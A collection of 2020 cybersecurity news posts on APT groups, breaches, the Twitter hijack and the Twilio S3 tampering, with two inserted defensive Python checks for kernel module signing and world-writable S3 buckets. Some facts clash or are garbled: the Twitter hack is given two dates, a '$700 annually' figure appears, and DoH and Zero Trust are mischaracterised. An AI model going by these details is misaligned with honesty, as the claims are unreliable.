Five Steps That Will Boost Your Cybersecurity And Assure Business Community In Real Life

 

The concept of business and marketing has seen tremendous change over the past few years. Business continuity once meant protecting your company in times of crisis; today it is about recovering from large-scale cyberattacks as quickly as possible. These threats include malware, phishing emails, DDoS attacks, ransomware, etc.


 
In recent times, there has been a rapid change in the field of cybersecurity too. It has now become a vital part of an organization's business continuity, in protecting employee data, intellectual property, operational plans, R&D, etc. Due to this, a question arises of 'how corporate and IT experts can work hand in hand' to protect an organization and promote its business. 

To achieve these goals, a simple five-step method, if followed, can ensure your organization's cybersecurity and protect it from threats and cyberattacks. 

1. Prioritize: Threat intelligence should be acquired and prioritized to formulate a defense plan. Keep in mind that simulated attacks are not as helpful as real-world attacks: simulations won't tell you your real strengths and weaknesses. This information helps experts identify the threats they must be most careful about and build a counter-testing plan. 

2. Measure: You should examine whether the measures you are taking to protect your business are helpful. If not, your preventive actions are ineffective. The plan should include analyzing threat adversaries and technical attacks, and how your people respond to them. 

3. Optimize: This step involves analyzing the gaps or barriers that you identified in the measuring stage. An effective business means overcoming these gaps and barriers. When the controls are optimized, the testing can then provide more measurable results that will make your security more robust. 

4. Rationalize: Is your investment in security measures proving beneficial or just a waste of money? With the help of the testing data acquired after optimizing controls, the experts now know where to cut costs and where to invest more. It allows a business to save money while keeping the risk factor under control. 

5. Monitor: The final and most crucial step involves keeping a constant eye on changing IT environment trends. New challenges may arise that your company will have to face; therefore, there should be a continuous evaluation of potential threats that might impact your business.

Hackers Attack Gaming Industry, Sell Player Accounts on Darkweb


Generating a tremendous revenue of $120.1 billion in 2019, the gaming industry is one of the largest and fastest-growing sectors. But this success comes at a high cost, as it makes the industry an attractive target for hackers. Moreover, cyber-attacks in the video game industry are hard to trace, which has made the sector vulnerable to cybercriminals in recent times.



About the attacks
As per recent research, there exist covert markets that trade stolen gaming accounts. These trades can generate an unbelievable $1 billion annually. Fortnite and Minecraft together account for 70% of what these underground markets make. According to reports, Roblox, Runescape, Fortnite, and Minecraft are responsible for generating $700 annually. Experts at Night Lion Security say that hackers selling stolen Fortnite player accounts are making up to $1 million annually.

Recent developments 
Hackers are now operating as a hierarchical organization, appointing designations for different work. The structured enterprise has positions like developers, senior managers, project managers, sales, and public relations to sensationalize their services.

  • The actors are using open cloud services and digital platforms to conduct their business. 
  • The hackers steal in-game inventories like skins, crates, and coupons from player accounts and sell them on the black market for a lower price. 
  • These hackers often target top gaming accounts and steal player profiles to trade them for lower prices in the underground market. 

Recent attacks 

  • Last month, experts found a game named "Fall Guys: Ultimate Knockout," which contained a malicious JavaScript API. It stole data from the targeted players' Discord and browser. 
  • In June 2020, around 1.3 million Stalker Online players' accounts were stolen and sold on the dark web later. 
  • In July 2020, a Nintendo leak revealed the game's details before they were officially launched in the market. 


The gaming industry now faces a bigger challenge in protecting its community from the rising attacks. A proactive and multi-layered approach can help gaming companies protect their customers, along with their products and services. Gamers should be careful too, avoiding reuse of the same password on other platforms.

Iranian Threat Actors Have Modified Their Strategies, Attacks Now More Effective


Since the dawn of the digital age, Iranian hackers have been infamous for their attacks on critical infrastructure, targeting governments, and hacking large corporate networks. The main motives behind these attacks are gathering espionage intelligence, stealing confidential information, ransomware attacks, and targeting massive data networks. Since 2019, the hackers have been using more developed strategies that are more effective in causing damage to their targets, resulting in better monetary benefits, says the Bloomsbury news.


Attack details

  • Earlier this year in April, hacking group APT34 (otherwise known as OilRig) launched a modified version of the backdoor named 'RDAT.' The backdoor uses a C2 channel that hides commands and data inside images sent as attachments. 
  • Earlier this year in May, APT34 also added a new tool to its hacking inventory, known as DNSExfiltrator. The tool has allowed hackers to become the first hacking group that uses the DoH (DNS-over-HTTPS) protocol in its attacks. 

Keeping these new modifications in the hacking realm in view, organizations should know that the criminals are evolving and modifying their methods over time. It suggests that hackers have become more powerful and pose a more significant threat to the cybersecurity world.

Other developments 

  • In August 2020, the FBI issued a security alert about the hacking group going by the name of 'Fox Kitten' attacking potentially weak F5 networks. The hacker's purpose was to attack private and public U.S. government organizations. 
  • In July 2020, making its comeback, threat actor Charming Kitten launched a cyberespionage campaign, using WhatsApp and LinkedIn to impersonate Persian-speaking journalists. The targets included the U.S. government and Israeli scholars belonging to Tel Aviv and Haifa universities. 
  • In June 2020, an amateur hacking group from Iran attacked Asian companies using 'Dharma' ransomware. 

According to intelligence reports, the hackers used widely available hacking tools to target companies in China, Russia, Japan, and India. Since July 2020, threat actor Fox Kitten has also become infamous for offering access to small corporate networks on hacking forums. According to experts, it is simply trying to generate revenue through other income channels, using systems that lack any intelligence value but bring Iran money.

A Brief Summary of The Potential Threats Revealed in Black Hat 2020 Conference


Cybersecurity experts had a lot to say about possible cybersecurity threats in the USA Black Hat Conference.

Main Highlights

US Presidential Elections
As the US awaits its presidential elections, cybersecurity has become a significant issue. In the conference, experts came out with various solutions to election-related cybersecurity threats that might arise during the campaigning and offered new ideas to strengthen the infrastructure.

Exploits and Vulnerabilities 
Cybersecurity expert Matt Vixey presented research on cybersecurity exploits. The main idea is that cyberattacks can only be prevented if there's a proper system involved; in other words, a plan of action. Here the 'human factor' is the risk, and it is what hackers attack.

DNS Attacks 
In recent times, DNS encryption and its security have come into question. Hackers have come up with a new way to breach the encryption; the technique is known as DoH (DNS-over-HTTPS). The key speaker on the topic was Mr. Eldridge Alexander, Security Research and Development manager at Cisco's Duo Labs.

Cyberthreats and COVID-19 
The COVID-19 pandemic saw a surge in cybersecurity threats. With people working from home, hackers saw new targets that were easy to attack. Keeping this particular issue in mind, Shyam Sundar Ramaswami presented several ways to identify pandemic-based malware or malspam, including a rapid static analysis approach.

A world without passwords 
Imagine a world with no passwords, a world where all systems are integrated with a unique authorization model. Wolfgang Goerlich and Chris Demundo presented their 'Zero Trust' theory, in which systems would not require passwords, making for a more secure cyber world.

Possible Threats

  • Influence campaigns: Misuse of social media platforms to disseminate fake news and misinformation has become a critical problem, especially during election campaigns. 
  • According to James Pevur, satellite communications are open to surveillance and monitoring. Hackers can easily bug communications using a few sophisticated gadgets. 
  • Botnets: Hackers can turn high-wattage devices into botnets to attack energy campaigns. 
  • Experts say that hackers can use open source tools to create fake websites or channels that look the same as the original, allowing them to influence public opinion.

APT36: A Pakistani Hacking Group, Strengthens Its Operations and Finds New Targets


Known as APT36, Transparent Tribe is a hacking group that operates from Pakistan. APT36 is infamous for monitoring and spying on government activities and military operations in Afghanistan and India. As per the latest reports, APT36 has now strengthened its workforce with better tools and strategies.

About the incident 

APT36 usually focuses on using the same TTP (tactics, techniques, and procedures) except in a few cases where it uses different strategies for unique programs.


Some key highlights:

  • According to the reports, APT36 has sharpened its tools and activities. This involves attack campaigns on a much larger scale, specifically targeting Afghanistan. 
  • Usually, APT36 uses custom .NET malware, commonly known as 'Crimson RAT.' APT36 has recently been using other malware as well, including the Python-based 'Peppy RAT.' 
  • In the period between June 2019 and June 2020, 200 samples were collected, which showed the Transparent Tribe Commission's components. 

Mode of operation 

  • APT36 uses spear-phishing emails containing MS Office files that carry the malware. After successful execution, the malware can steal sensitive information and private credentials, capture screenshots, steal logs and keys, and control the microphone and webcam. 
  • Besides this, APT36 also uses USBWorm. It is a multipurpose malware that can steal information and function as a worm to attack any network and exploit vulnerabilities. 


APT36 attacks


  • APT36 attacked Indian Railways in June and stole important information. 
  • Earlier this year, APT36 deployed spear-phishing emails posing as authentic communications from the Government of India. 
  • Cybersecurity experts have observed that over the past year APT36's primary targets have been military and diplomatic. According to them, the attacks will not decrease in the foreseeable future; on the contrary, they expect them to rise. 

According to Kaspersky's report, "we found two different server versions, the one being a version that we named "A," compiled in 2017, 2018, and 2019, and including a feature for installing the USBWorm component and executing commands on remote machines. The version that we named "B" was compiled in 2018 and again at the end of 2019. The existence of two versions confirms that this software is still under development, and the APT group is working to enhance it."

FBI Arrests Russian Hacker, Who Tried To Convince An Employee to Hack His Nevada Company


A hacker from Russia went to America and asked an employee of a Nevada company to install malware on their company network. 

In a recent incident, the U.S. Department of Justice declared charges against a Russian hacker today. The Russian national had traveled all the way to America to ask an American employee if he could set up malware, offering him $1,000,000 for the job. As per the court's reports today, the culprit, a 27-year-old hacker from Russia named Egor Igorevich Kriuchkov, was found to be a member of an infamous Russian hacking group. The purpose of the attack was to gain internal access to the company's network and steal confidential information, later to be used for extortion.


According to the company employee, Igor told him that to prevent the company from noticing the primary attack, his team of hackers would launch DDoS attacks as a decoy to distract the corporation. "The purpose of the conspiracy was to recruit an employee of a company to surreptitiously transmit malware provided by the coconspirators into the company's computer system, exfiltrate data from the company's network, and threaten to disclose the data online unless the company paid the coconspirators' ransom demand," says the court document.

However, Igor's heist plan failed when the employee who was contacted reported this incident to the FBI. The FBI kept a watch on Igor for the first few days, observing his every move. When it finally had all the evidence for the prosecution, the FBI arrested Igor last Saturday.

Timeline from Igor's visit to his arrest: 
  • Igor contacts the employee CHS1 (as identified by the court) via WhatsApp and briefs him about the attack. The two had been friends two years earlier. 
  • Igor arrives in the U.S. and meets with CHS1 at a bar. 
  • On the last day of his trip, Igor gives CHS1 all the details about the 'special project.' 
  • Later, the FBI contacts Igor, who tries to flee the country at that moment and is finally arrested.

Facebook Struggles Against Hate Speech and Misinformation, Fails to Take Actions


In the last month, FB CEO Mark Zuckerberg and others met with civil rights activists to discuss FB's way of dealing with the rising hate speech on the platform. The activists were not happy with Facebook's failure to deal with hate speech and misinformation. As it seems, the civil rights groups took 'advertising boycott' action against the social media giant and expressed their stark criticism. According to these civil groups, they have had enough of Mark Zuckerberg's incompetence in dealing with white supremacy, propaganda, and voter suppression on FB.


This move to boycott Facebook came as a response to Donald Trump's recent statements on FB. Trump said that anti-racism protesters should be treated with physical violence, and he also spread misinformation about mail-in voting. FB, however, denies the allegations, saying these posts didn't violate community policies. Even after such incidents, the company maintains that everything is alright and that it just needs to toughen up its enforcement actions.

"Facebook stands firmly against hate. Being a platform where everyone can make their voice heard is core to our mission, but that doesn't mean it's acceptable for people to spread hate. It's not. We have clear policies against hatred – and we constantly strive to get better and faster at enforcing them. We have made real progress over the years, but this work is never finished, and we know what a big responsibility Facebook has to get better at finding and removing hateful content." "Later this morning, Mark and I, alongside our team, are meeting with the organizers of the Stop Hate for Profit campaign followed by a meeting with other civil rights leaders who have worked closely with us on our efforts to address civil rights," said COO Sheryl Sandberg in her FB post.

In another incident, FB refused to take action against T. Raja Singh, an Indian politician from the BJP. According to the Wall Street Journal, the company didn't apply its hate speech policies to Raja's Islamophobic remarks. FB employees admitted that the politician's statements were enough to terminate his FB account. The company refused to, because, according to the FB executive in India, doing so could hurt FB's business in India.

Russian Hackers Use Linux Malware Drovorub, NSA and FBI Finds Out


The NSA and FBI released a joint report today describing a new kind of Linux malware. According to the two intelligence agencies, state-sponsored Russian military hackers are using this new malware. The hackers used Drovorub to plant backdoors inside breached networks. Fancy Bear and Sednit (APT28) are behind these attacks. The NSA and FBI have notified major private and public companies to stay aware of the malware and implement protective measures. The malware is a multi-component system built around an implant. It comes with a file transfer kit, a C2 server, a kernel module tool, and a port-forwarding module.


The malware is a kind of Swiss army knife. Using Drovorub, hackers can do many things, such as controlling the target's systems and stealing data and personal files. Besides this, Drovorub is designed to work in stealth mode, using rootkit techniques to stay undetected. It lets hackers deploy implants across different systems and attack at any given moment. On the subject of cyberattacks, the US has always been a primary target for cybercriminals due to its sophisticated technology environment.

There's no substantial evidence as to the motive behind this attack. However, experts believe that the purpose might be espionage or tampering the upcoming presidential elections. The joint report of FBI and NSA says, "The Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS), military unit 26165, is deploying previously undisclosed malware for Linux® systems, called Drovorub, as part of its cyberespionage operations. GTsSS malicious cyber activity has formerly been attributed by the private sector using the names Fancy Bear, APT28, Strontium, and various other identifiers."

To stay safe, the agencies have recommended that US companies update their Linux systems to kernel version 3.7 or later. "To prevent an order from being susceptible to Drovorub's hiding and persistence, system administrators should upgrade to Linux Kernel 3.7 or later to take full advantage of kernel signing enforcement. Additionally, system owners are advised to configure systems to load only modules with a valid digital signature making it more difficult for an actor to introduce a malicious kernel module into the system," says the US intelligence agencies' report.
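The mitigation quoted above has two parts: a kernel new enough to support module signing (3.7 or later) and a configuration that actually refuses unsigned modules. The check below is an added example, not code from the NSA/FBI report or from this blog. It reads the same three sources an administrator would inspect by hand (the kernel release string, the CONFIG_MODULE_SIG* lines of the kernel's build config, and the runtime sig_enforce parameter under /sys) and reports whether unsigned modules would still load. All inputs are passed as strings so the logic runs offline on the constructed samples at the bottom; the 3.7 threshold comes from the quoted recommendation, while the file paths are the standard kernel ones and the sample hosts are invented.

```python
"""Assess whether a Linux host enforces kernel-module signatures (added example)."""
import os
import platform
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

MIN_KERNEL = (3, 7)  # version named in the joint NSA/FBI recommendation
SIG_ENFORCE_SYSFS = "/sys/module/module/parameters/sig_enforce"  # runtime "Y"/"N"


@dataclass
class SigningAssessment:
    kernel: Tuple[int, ...]
    kernel_ok: bool               # kernel >= 3.7
    sig_supported: bool           # CONFIG_MODULE_SIG=y (signatures are checked)
    sig_forced_at_build: bool     # CONFIG_MODULE_SIG_FORCE=y (unsigned refused)
    sig_enforced_at_runtime: bool  # module.sig_enforce=1 / sysfs reports Y
    findings: List[str] = field(default_factory=list)

    @property
    def enforcing(self) -> bool:
        return self.kernel_ok and self.sig_supported and (
            self.sig_forced_at_build or self.sig_enforced_at_runtime)


def parse_kernel_release(release: str) -> Tuple[int, ...]:
    """'5.4.0-42-generic' -> (5, 4, 0); a two-part version gets a trailing 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x or 0) for x in m.groups())


def parse_kconfig(lines) -> dict:
    """Turn 'CONFIG_X=y' and '# CONFIG_X is not set' lines into a dict."""
    cfg = {}
    for line in lines:
        line = line.strip()
        m = re.match(r"^(CONFIG_\w+)=(.*)$", line)
        if m:
            cfg[m.group(1)] = m.group(2).strip('"')
            continue
        m = re.match(r"^# (CONFIG_\w+) is not set$", line)
        if m:
            cfg[m.group(1)] = "n"
    return cfg


def assess(release: str, config_lines, sig_enforce_sysfs: Optional[str]) -> SigningAssessment:
    kernel = parse_kernel_release(release)
    cfg = parse_kconfig(config_lines)
    supported = cfg.get("CONFIG_MODULE_SIG") == "y"
    forced = cfg.get("CONFIG_MODULE_SIG_FORCE") == "y"
    runtime = (sig_enforce_sysfs or "").strip().upper() == "Y"
    a = SigningAssessment(kernel, kernel >= MIN_KERNEL, supported, forced, runtime)
    if not a.kernel_ok:
        a.findings.append(f"kernel {release} predates module signature enforcement")
    if not supported:
        a.findings.append("CONFIG_MODULE_SIG is not enabled; modules cannot be verified")
    elif not (forced or runtime):
        a.findings.append("signatures are checked but unsigned modules still load "
                          "(build with CONFIG_MODULE_SIG_FORCE=y or boot with module.sig_enforce=1)")
    return a


def assess_live_host() -> SigningAssessment:
    """Read the real files on this machine; not used by the offline samples."""
    release = platform.release()
    try:
        with open(f"/boot/config-{release}") as f:
            cfg = f.read().splitlines()
    except OSError:
        cfg = []  # distro keeps the config elsewhere; signing support stays unknown
    enforce = open(SIG_ENFORCE_SYSFS).read() if os.path.exists(SIG_ENFORCE_SYSFS) else None
    return assess(release, cfg, enforce)


# --- constructed sample configs (invented hosts, not real systems) ---
WEAK_CONFIG = ["CONFIG_MODULES=y", "# CONFIG_MODULE_SIG is not set"]
CHECKING_ONLY = ["CONFIG_MODULE_SIG=y", "# CONFIG_MODULE_SIG_FORCE is not set"]
HARDENED = ["CONFIG_MODULE_SIG=y", "CONFIG_MODULE_SIG_FORCE=y", 'CONFIG_MODULE_SIG_HASH="sha512"']

if __name__ == "__main__":
    samples = [("old-kernel", "3.2.0-4-amd64", WEAK_CONFIG, None),
               ("checking-only", "5.4.0-42-generic", CHECKING_ONLY, "N\n"),
               ("hardened", "5.4.0-42-generic", HARDENED, "Y\n")]
    for name, rel, cfg, sysfs in samples:
        r = assess(rel, cfg, sysfs)
        print(f"{name}: enforcing={r.enforcing} findings={r.findings}")
```

The "checking-only" case is the one worth noticing: CONFIG_MODULE_SIG=y alone only tags unsigned modules as tainted, so a host can appear to have signing support while still loading an unsigned rootkit module; enforcement needs either CONFIG_MODULE_SIG_FORCE at build time or module.sig_enforce=1 on the kernel command line.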

Online Exam Tool ProctorU Breached, Half A Million User Accounts Leaked Online


Around half a million online users were affected due to the breach of online examination software called "ProctorU," a platform widely used in teaching institutes. The hackers, belonging to Shiny Hunters Group, recently posted the leaked data on the web, which contained details of 444,267 users, confirm the cybersecurity experts. ProctorU is a tool that provides institutions automatic monitoring options while conducting the examination. ProctorU, an American firm, built the application.


The leaked data belong to different individuals and organizations, including various educational institutes, companies, and users of the breached software. The data leak is part of a bigger scheme by the Shiny Hunters Group, say some sources. They have posted other leaks in recent weeks. More than 386 million users' data was published online in the past week by hackers. The companies affected include Couchsurfing, WattPad, Minted, Bhinneka, Dunzo, Dave.com, and many others. The data leaked online includes sensitive user information such as usernames, passwords, full names, contact numbers, and residential addresses.

Various universities worldwide have been affected by this breach, as they relied on ProctorU for conducting online examinations, keeping social distancing in mind due to the coronavirus. Sydney University had done the same and used ProctorU to conduct its semester examinations. The University released a statement related to the breach expressing concern about the event. But the University of Sydney has come under a lot of criticism from users as well as experts. According to them, ProctorU violates the student privacy policy laid down by the University.

Students have complained that the techniques ProctorU uses to keep a watch can be very intrusive and personal. During the examination, the tool asked students to show their surroundings, and also had control over the user's computer. It could be possible that ProctorU could send these data to third parties. "We consistently warned the University that this could happen. We demand the University immediately suspend the use of ProctorU, as that is the only way to guarantee that students are not exposed again in the future," said the Student Council of the University.

Florida Teen Responsible for Hijacking High Profile Twitter Accounts Arrested, Faces 30 Felony Charges


US police authorities said in a press conference on Friday that they had arrested the main accused and two other suspects responsible for a major Twitter hack earlier this month. The main accused is identified as Graham Ivan Clark, a 17-year-old who lives in Tampa, Florida. WFLA-TV, the Florida-based news agency that first reported the incident, said that it was the main suspect (Clark) who was arrested for the Twitter attack. The arrest happened through a national collaboration between the IRS, the Secret Service, the FBI, and the DOJ.


Andrew Warren, State Attorney of Hillsborough, charged Clark as responsible for the 15th July Twitter incident. Clark was alleged to be the "mastermind" behind the attack in which the 'suspects hijacked various high profile Twitter accounts.' The hackers used these accounts to tweet fake cryptocurrency scams. Here's a list of hijacked accounts: Joe Biden, Barack Obama, Bill Gates, Kanye West, Elon Musk, Apple, Jeff Bezos, Uber, Michael Bloomberg, Kim Kardashian, and various others. According to officials, the hack resulted in $100,000 being transferred to Clark's account within a day.

Clark now faces 30 felony charges. These include: 

  • Communications Fraud 
  • Organizing Fraud 
  • Use of personal information for frauds 
  • Accessing an electronic device without legal authority


The charges specified above were announced via livestream by the Hillsborough State Attorney. At first, Warren didn't specify whether Clark had other associates working with him. After the press conference, it came to public notice that two other suspects were working with Clark, identified as Mason Sheppard, 19, alias "Chaewon," and Nima Fazeli, 22, alias "Rolex." The suspects' arrest happened just after Twitter had published its inquiry report on the 15th July Twitter hack.

Some of the critical points in the report are mentioned below:

  • The incident happened on 20th July 2020. 
  • To gain access to Twitter employees' accounts, hackers used phone-based social engineering. Hackers got access to the Slack accounts and obtained credentials (yet to be confirmed). 
  • Hackers bypassed two-step authentication; the report doesn't mention whether on backend accounts or Slack accounts. 
  • After this, hackers used Twitter's tech support tools to control the accounts. 
  • Hackers breached 130 accounts. 
  • Hackers also attempted to sell some of the high profile Twitter profiles.

Telegram Takes Down Islamist Propaganda on its Platform, Extremist Groups Struggle


The social networks and the US military have imposed strict regulations to control Islamist propaganda on social media and have been able to take down Islamic State terrorist groups. After this move, experts say these groups are now struggling to recover their foothold on the mainstream social media apps and networks. As most of the major social networking sites have choked the group off, the Islamist group has tried to build its propaganda on smaller sites. But even there, it has been met by strong regulation by the authorities. According to Europol, an EU (European Union) law enforcement agency, the social networking companies have tried to take down the Islamist propaganda content growing on their websites, in an attempt to shut down the extremist group's activities on social media.


Europol, in its report, said, "While Google and Instagram deployed resilience mechanisms across their services, Telegram was the online service provider receiving most of the referral requests during this Action Day. As a result, a significant portion of key actors within the IS network on Telegram were pushed away." These extremist groups used Telegram as their primary platform of propaganda until 2019.

According to Europol, Telegram removed up to 5000 terrorist profiles and bots in two days, in an effort to shut down the Islamist propaganda. Earlier, it had only been able to take down 200-300 accounts on average. After that incident, the extremist groups moved towards more covert apps like the Russian "TamTam" and "Hoop Messenger." Canada hosts these websites. The IS, in apparent desperation, has also started using chat services designed for blockchain developers to spread its messages. In 2016-17, the US Cyber Command took action against these extremist groups. It shut down recruitment groups and suppressed their further attempts to spread their messages.

Currently, the US cyber command has presidential approval to combat IS propaganda with cyberattacks. They have also widened their jurisdiction area since then. "In the past year and a half, Telegram has also put forth a considerable effort to root out the abusers of the platform by bolstering its technical capacity in countering malicious content and establishing a close partnership with Europol," says Europol.

Gothic Panda and Stone Panda: Chinese Hackers that Launched Mass Cyber Attacks on Indian Companies


Two hacking groups from China named Gothic Panda and Stone Panda have been identified as organizing the majority of the cyber attacks on Indian companies in June 2020. Mumbai Mirror was the first to report the incident; on 20th June, it published a report on its website regarding the issue. As per the cybersecurity experts, both hacking groups are likely to work independently and are not state-sponsored; however, they work in the interests of the Chinese government. According to experts, an anonymous source said that the attacks were launched under the disguise of VPNs and proxy servers. After investigation, the attacks led us to Gothic Panda and Stone Panda, say the officials.

Chinese hackers launched more than 40,000 attacks. The hackers used some unique malware to gain confidential data from the companies and later used the information for extortion. According to the reports, the hackers broke through the security measures of at least six private/public companies. These include a government-regulated organization in Jammu and Kashmir and companies operating in New Delhi and Mumbai. The attacks were traced back to the south-western Chinese province of Sichuan. These players also attempted to take down websites linked to companies involved in banking and finance.

The hackers used DDoS attacks (Distributed Denial of Service) and Internet Protocol Hijack. Experts say that these attacks, also called 'Probes,' look for vulnerabilities in a website's security features. In an incident where the hackers were able to crash the website, the home page was modified, and the content was changed with a foreign language. Experts say that there were no other successful probes except this incident.

In a DDoS attack, the hacker tries to overwhelm a network resource, such as a website. For example, if a website's hosting provider can handle 5000 requests/second, the hackers will flood it with 500,000 requests/second and crash the website. In an Internet Protocol Hijack, on the other hand, the hacker tries to divert the course of traffic. In this case, the internet traffic was diverted through China for surveillance purposes.

Hackers Breached into Twilio's AWS; Company Confirms the Attack


In a recent cybersecurity breach, Twilio acknowledged that hackers broke into the company's (unsecured) cloud storage and compromised its JavaScript SDK. The hackers modified the JavaScript that the company ships to its clients. Twilio, a well-known cloud communications company, told a news agency about the incident after an anonymous whistleblower had reported the issue to the agency. To summarise: a cybercriminal got into Twilio's AWS (Amazon Web Services) S3 storage. It should be noted that the storage was unsecured and world-writable. The hacker modified the TaskRouter v1.20 SDK and added malicious code designed to check whether the change had worked.


In response to the incident, Twilio says that customers' privacy and safety are the company's first and foremost concern. Twilio confirms the malware in the TaskRouter v1.20 SDK and that it was the work of a third party. The modifiable S3 bucket made the attack possible. According to Twilio, it closed the S3 bucket immediately after learning of the issue and has opened an inquiry into the incident. The company took around 12 hours to deal with the issue. Currently, it has no evidence either way as to whether any customer accounts were stolen. However, it confirms that the hacker didn't break into the company's internal systems to modify code or data.

The JavaScript SDK is how customers connect their business operations to Twilio's TaskRouter platform. The company plans to publish a detailed report about the incident in a few days. In the meantime, a friendly suggestion to users: if you have downloaded or installed a copy of the SDK, make sure that you have a legitimate copy.

"Our investigation of the javascript that was added by the attacker leads us to believe that this attack was opportunistic because of the S3 bucket's misconfiguration. We believe that the attack was designed to serve malicious advertising to users on mobile devices," said Twilio to The Register as a response to the incident. It also says, "If you downloaded a copy of v1.20 of the TaskRouter JS SDK between July 19th, 2020 1:12 PM and July 20th, 10:30 PM PDT (UTC-07:00), you should re-download the SDK immediately and replace the old version with the one we currently serve."
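Twilio attributes the incident to a world-writable S3 bucket. The check below is an added example, not Twilio's code or tooling: it takes a bucket ACL and a bucket policy in the dict shapes that boto3's get_bucket_acl() and get_bucket_policy() return and reports any grant or statement that lets an anonymous principal write objects. It goes slightly beyond the single case in the story by covering both ways a bucket can become public-writable (ACL grants to the AllUsers/AuthenticatedUsers groups, and policy statements with a wildcard principal), and it runs offline on the constructed samples below; the bucket names, grants and statements are invented, while the group URIs and action names are the real AWS ones.

```python
"""Flag S3 buckets that anonymous users can write to (added example)."""
import json
from typing import List, Optional

# AWS canned ACL groups that mean "the public".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
# Policy actions that let a principal change bucket contents or its access
# rules; compared case-insensitively because IAM action names are.
WRITE_ACTIONS = {"s3:putobject", "s3:deleteobject", "s3:putobjectacl",
                 "s3:putbucketacl", "s3:putbucketpolicy", "s3:*", "*"}


def _as_list(x):
    """IAM allows a single string wherever a list is accepted."""
    return x if isinstance(x, list) else [x]


def _principal_is_public(principal) -> bool:
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_write_grants(acl: dict) -> List[str]:
    """ACL grants giving a public group a write-class permission."""
    hits = []
    for g in acl.get("Grants", []):
        grantee = g.get("Grantee", {})
        if (grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS
                and g.get("Permission") in WRITE_PERMISSIONS):
            hits.append(f"ACL: {grantee['URI'].rsplit('/', 1)[-1]} has {g['Permission']}")
    return hits


def public_write_statements(policy: dict) -> List[str]:
    """Allow statements granting write actions to a wildcard principal.

    Statements carrying a Condition are still reported: the condition may
    narrow the grant, but that needs human review rather than a silent pass.
    """
    hits = []
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not _principal_is_public(st.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(st.get("Action", []))}
        writes = sorted(actions & WRITE_ACTIONS)
        if writes:
            note = " (has Condition, review)" if "Condition" in st else ""
            hits.append(f"policy {st.get('Sid', '<no Sid>')}: {', '.join(writes)} to *{note}")
    return hits


def assess_bucket(name: str, acl: dict, policy_json: Optional[str]) -> dict:
    """Combine both checks; policy_json is the raw string the API returns."""
    findings = public_write_grants(acl)
    if policy_json:
        findings += public_write_statements(json.loads(policy_json))
    return {"bucket": name, "world_writable": bool(findings), "findings": findings}


# --- constructed samples (invented buckets, not Twilio's) ---
PRIVATE_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"},
                           "Permission": "FULL_CONTROL"}]}
OPEN_ACL = {"Grants": PRIVATE_ACL["Grants"] + [
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "WRITE"}]}
# A CDN bucket that only serves files publicly: expected and harmless.
READ_ONLY_POLICY = json.dumps({"Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-sdk-cdn/*"}]})
# The same bucket with PutObject added: anyone can replace the served SDK.
OPEN_POLICY = json.dumps({"Statement": [
    {"Sid": "Oops", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:GetObject", "s3:PutObject"], "Resource": "arn:aws:s3:::example-sdk-cdn/*"}]})

if __name__ == "__main__":
    for name, acl, pol in [("cdn-ok", PRIVATE_ACL, READ_ONLY_POLICY),
                           ("cdn-acl-open", OPEN_ACL, READ_ONLY_POLICY),
                           ("cdn-policy-open", PRIVATE_ACL, OPEN_POLICY)]:
        print(assess_bucket(name, acl, pol))
```

Public read on a bucket that serves an SDK is by design; public write is what turns that bucket into a supply-chain vector, which is why the check distinguishes the two rather than flagging every wildcard principal.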

Importance of Cybersecurity in the Healthcare Sector


Hackers and cybercriminals have targeted the healthcare sector for a long time. Within the healthcare industry, hospitals are generally the primary target for hackers, as they generate a lot of money. Hospitals hold very sensitive information about patients, including credentials and personal data, and hackers can take advantage of that. Due to the coronavirus pandemic, hospitals have received a large amount of funding from the government and other agencies to deal with the crisis, and the hackers are after that money.


The critical issue is that healthcare IT systems store patient credentials, including banking details, ID, and credit card details. Besides this, information such as a patient's HIV status can be exposed and exploited by cybercriminals for extortion. On the dark web, ID credentials can be sold for a high price, so the government and healthcare industry should take extra precautions to stay safe from cyber attacks. In the present pandemic crisis, blackmail has become one of the most common cyberattack threats. Blackmail is different from ransomware: in the latter, the attacker holds company data to ransom by encrypting it with malware, whereas in blackmail the hacker threatens to expose critical data unless his demands, mostly for money, are met.

In this scenario, hospitals have little option but to pay the cybercriminal, as the release of patient information is not only dangerous but also a breach of doctor-patient confidentiality. In the early phase of the COVID-19 outbreak, hackers across the world did not target the healthcare industry. This created a false sense of security among governments and experts that the healthcare sector was safe from hackers and cyber attacks. It was not long, however, before hackers turned their attention to attacking healthcare.

Therefore, the healthcare industry should step up and build a robust cybersecurity infrastructure that ensures patients' privacy and security. General cybersecurity awareness among citizens is also essential, and hospital staff in particular should be sensitized. Finally and most importantly, healthcare institutions should team up with cybersecurity agencies that provide protection from cyber attacks and hackers.

Black Box: A New ATM Attack that Diebold Nixdorf Warns Of


A new kind of ATM attack called "Black Box" has surfaced, and ATM maker Diebold Nixdorf is warning the financial sector to stay on alert. The attack has recently been widespread across Europe. Black Box ATM attacks are similar to jackpotting, in which attackers make ATMs dispense cash in large quantities; in jackpotting, attackers either install malware on the ATM or connect a black box device to it instead. "Some of the successful attacks show a new adapted Modus Operandi on how the attack is performed. Although the fraudster is still connecting an external device, at this stage of our investigations, it appears that this device also contains parts of the software stack of the attacked ATM," says Diebold Nixdorf.


